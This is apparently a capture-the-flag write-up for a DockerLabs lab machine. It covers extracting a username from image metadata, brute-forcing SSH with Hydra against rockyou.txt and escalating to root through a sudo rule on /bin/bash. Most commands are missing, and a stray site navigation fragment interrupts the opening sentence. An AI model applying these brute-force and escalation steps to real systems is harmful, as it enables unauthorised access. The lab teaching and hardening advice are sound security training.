BorazuwarahCTF is a Very Easy DockerLabs machine that chains three distinct techniques into a clean learning path: steganography to extract a hidden username from an image, Hydra to brute-force SSH credentials, and a dangerously misconfiguredDocumentation Index
Fetch the complete documentation index at: https://mintlify.com/V0rt3xS0urc3/RedTeam-Portfolio/llms.txt
Use this file to discover all available pages before exploring further.
sudo rule to escalate directly to root. It is an ideal machine for practising OSINT-style image analysis alongside classic credential attacks.
Machine Info
| Field | Details |
|---|---|
| Difficulty | Very Easy (Muy Fácil) |
| Category | Hacking Infraestructura |
| OS | Linux |
| Key Techniques | Steganography, SSH brute force, sudo privilege escalation |
| Default Target IP | 172.17.0.2 |
Phase 0: Launch Kali Portable
Open a second terminal window and start your Kali Portable environment before doing anything else:Phase 1: Deploy the Machine
DownloadborazuwarahCTF.zip from DockerLabs, then in your first terminal:
172.17.0.2.
Phase 2: Reconnaissance
Verify Connectivity
Before scanning, confirm the container is alive:You should see replies with low latency — you are on the same Docker bridge network.
Nmap Service Scan
Run a version + default-script scan at an accelerated rate (safe in this controlled environment):
Findings:
| Argument | Meaning |
|---|---|
-sC | Runs default NSE scripts for common checks |
-sV | Detects service versions |
--min-rate 2000 | Sends ≥2000 packets/s — fast but noisy |
| Port | Service | Version |
|---|---|---|
| 22/tcp | SSH | OpenSSH 9.2p1 |
| 80/tcp | HTTP | Apache |
Phase 3: Web Enumeration
Navigate tohttp://172.17.0.2 in a browser. The page displays a single image — a Kinder Surprise egg (huevito.jpeg). There is no obvious navigation or login form.
Run Gobuster to find any hidden paths:
Phase 4: Steganography — Extracting the Hidden Username
This is the core phase of the machine. The image contains hidden data retrievable through two complementary methods.Metadata Analysis with Exiftool
Check the image’s EXIF metadata — a frequently overlooked source of information:Key finding: The metadata field
Description (or a similar field) contains the username borazuwarah. This is the credential needed for the next phase.Steghide Extraction with Stegseek
Stegseek is a high-speed steghide cracker that can test thousands of passwords per second. Run it against the rockyou wordlist:Stegseek finds the steghide passphrase and extracts an embedded file. The file content itself does not reveal directly useful credentials, but confirms that the image was used as a steganographic container.
- Username:
borazuwarah(from EXIF metadata) - Confirmed steganographic content inside
huevito.jpeg
Phase 5: SSH Brute Force with Hydra
Armed with the username, use Hydra to brute-force the SSH password against rockyou.txt:| Argument | Meaning |
|---|---|
-l borazuwarah | Single known username |
-P rockyou.txt | Password wordlist |
ssh://172.17.0.2 | Target protocol and IP |
-t 64 | 64 parallel threads |
rockyou.txt.
As an experiment, you can also test Nmap’s built-in SSH brute-force script for comparison:In this local Docker environment, Nmap’s more efficient TCP connection handling can make it faster than Hydra. In real-world networks with latency and rate-limiting, Hydra is generally more reliable and configurable.
Phase 6: SSH Access
Connect to the machine with the discovered credentials:borazuwarah user.
Phase 7: Privilege Escalation via Sudo
Enumerate Sudo Permissions
Check what commands the current user can run as root:Output:This is an extremely dangerous misconfiguration: the user can run
/bin/bash as any user — including root — without a password prompt.Post-Lab Cleanup
When you are done, return to your deploy terminal and pressCtrl+C to stop and remove the Docker container. Then type exit to leave the Kali Portable session.
Key Takeaways
Steganography as an Attack Vector
Image metadata (EXIF fields) can expose usernames, emails, or GPS coordinates. Always inspect files thoroughly with
exiftool and stegseek before moving on.Weak Passwords Are the Problem
The password found here is near the top of
rockyou.txt. A strong, unique password would have stopped Hydra in its tracks. Password policies matter.sudo /bin/bash = Root Access
Granting
sudo access to a shell binary (bash, sh, zsh) is equivalent to giving full root access. Use sudo only for specific, non-interactive commands.SSH Hardening
Implement
fail2ban to block brute-force attempts, disable password authentication in favour of SSH keys, and consider changing the default port to reduce automated scanning noise.